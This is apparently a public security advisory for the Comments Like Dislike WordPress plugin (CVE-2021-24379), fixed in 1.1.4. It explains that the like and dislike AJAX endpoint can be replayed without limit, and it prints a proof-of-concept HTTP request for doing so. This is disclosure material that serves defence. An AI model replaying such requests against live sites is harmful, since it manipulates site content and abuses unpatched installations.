WordPress Plugin Vulnerabilities

Comments Like Dislike < 1.1.4 - Add Like/Dislike Bypass

Description

The plugin allows users to like/dislike posted comments, however does not prevent them from replaying the AJAX request to add a like. This allows any user (even unauthenticated) to add unlimited like/dislike to any comment. The plugin appears to have some Restriction modes, such as Cookie Restriction, IP Restrictions, Logged In User Restriction, however, they do not prevent such attack as they only check client side

v1.1.3 fixed the issue for the Logged In User Restriction mode, but not the others. v1.1.4 fixed it for the remaining affected modes.

Proof of Concept

Capture the request made when adding a like to a comment, and replay the request

POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 73
Connection: close

comment_id=6&action=cld_comment_ajax_action&type=like&_wpnonce=a772faf68b

Affects Plugins

Plugin icon
comments-like-dislike
Fixed in 1.1.4

References

CVE
CVE-2021-24379

Miscellaneous

Original Researcher
Phu Tran from techlabcorp.com
Submitter
Phu Tran
Verified
Yes
WPVDB ID
aae7a889-195c-45a3-bbe4-e6d4cd2d7fd9

Timeline

Publicly Published
2021-06-07 (about 2 years ago)
Added
2021-06-07 (about 2 years ago)
Last Updated
2021-08-10 (about 2 years ago)

Other

Published
Title
Published
2017-11-29
Title
WordPress 2.8.6-4.9 - Authenticated JavaScript File Upload
Published
2019-01-16
Title
Social Network Tabs - Social Media API Key Leakage
Published
2023-10-03
Title
Captcha/Honeypot for Contact Form 7 < 1.11.4 - Captcha Bypass
Published
2014-06-26
Title
JSON REST API 1.1 - JSONP SOP Bypass
Published
2020-08-20
Title
Advanced Access Manager < 6.6.2 - Authenticated Authorization Bypass and Privilege Escalation